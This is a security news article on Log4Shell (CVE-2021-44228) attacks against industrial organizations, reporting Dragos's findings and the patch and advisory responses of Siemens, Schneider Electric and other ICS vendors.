Industrial Organizations Targeted in Log4Shell Attacks
Industrial organizations are exposed to attacks leveraging a recently disclosed — and already exploited — vulnerability affecting the widely used Log4j logging utility.
Industrial cybersecurity firm Dragos reported on Monday that it has observed both attempted and successful exploitation of the vulnerability, and the company says it has already coordinated the takedown of a malicious domain used in attacks.
The critical vulnerability, tracked as CVE-2021-44228 and dubbed Log4Shell and LogJam, came to light in late November, and it was patched on December 6. Evidence suggests that exploitation of the vulnerability may have started on December 1, but mass exploitation began on around December 9, after weaponized proof-of-concept (PoC) exploits were made available.
Apache Log4j is a Java-based logging tool that is included in various open source libraries, and is directly embedded in many popular software applications.
A security hole affecting the cross-platform library, specifically its Java Naming and Directory Interface (JNDI) lookup feature, can be exploited for remote code execution by getting the targeted system to log a specially crafted string.
Many threat groups have exploited the vulnerability — which can be used to take complete control of a system — to deliver various types of malware.
“This cross-cutting vulnerability, which is both vendor agnostic and affects both proprietary and open-source software, will leave a wide swathe of industries exposed to remote exploitation, to include electric power, water, food and beverage, manufacturing, transportation, and more,” Dragos said.
“Log4j is found in popular open-source repositories used in numerous industrial applications, such as Object Linking and Embedding for Process Control (OPC) Foundation’s Unified Architecture (UA) Java Legacy. Additionally, adversaries can leverage this vulnerability in proprietary Supervisory Control and Data Acquisition (SCADA) and Energy Management Systems (EMS) which make use of Java in their codebase,” it added.
The company noted that while the Lightweight Directory Access Protocol (LDAP) has been the primary attack vector, it has observed attack attempts leveraging DNS and Remote Method Invocation (RMI).
Dragos pointed out that robust segmentation of the IT/OT networks significantly reduces the risk of impact on industrial systems, but the company warned that threat actors may develop more sophisticated Log4Shell exploits once network defenders address the easier exploit paths.
ICS vendors respond to Log4Shell
Industrial control system (ICS) manufacturers have started responding to Log4Shell.
As of Monday night, Siemens has confirmed that 17 of its products are affected by CVE-2021-44228 and there are many more that are still being analyzed. The German industrial giant has started releasing patches and it has provided mitigation advice.
Products confirmed to be affected include E-Car OC, EnergyIP, Geolus, Industrial Edge Management, Logo! Soft Comfort, Mendix, MindSphere, Operation Scheduler, Siguard DSA, Simatic WinCC, SiPass, Siveillance, Solid Edge, and Spectrum Power.
Schneider Electric has also released an advisory, but it’s still working on determining which of its products are affected. In the meantime, it has shared general mitigations to reduce the risk of attacks.
Inductive Automation, which provides SCADA software and industrial automation solutions, told customers that it has conducted a full audit and determined that its products are not impacted.
“Software vendors in the OT space are in a unique position to help their clients by ideally having tabs on their software, but also within environments they help maintain (e.g. service agreement),” Ron Brash, VP of technical research at aDolus Technology, told SecurityWeek.
“Unfortunately, there are varying levels of component awareness when it comes to vendor supply chain security, and this is particularly problematic for current and past products where accurate component inventories are lacking or source code/build chains are poorly understood,” Brash said.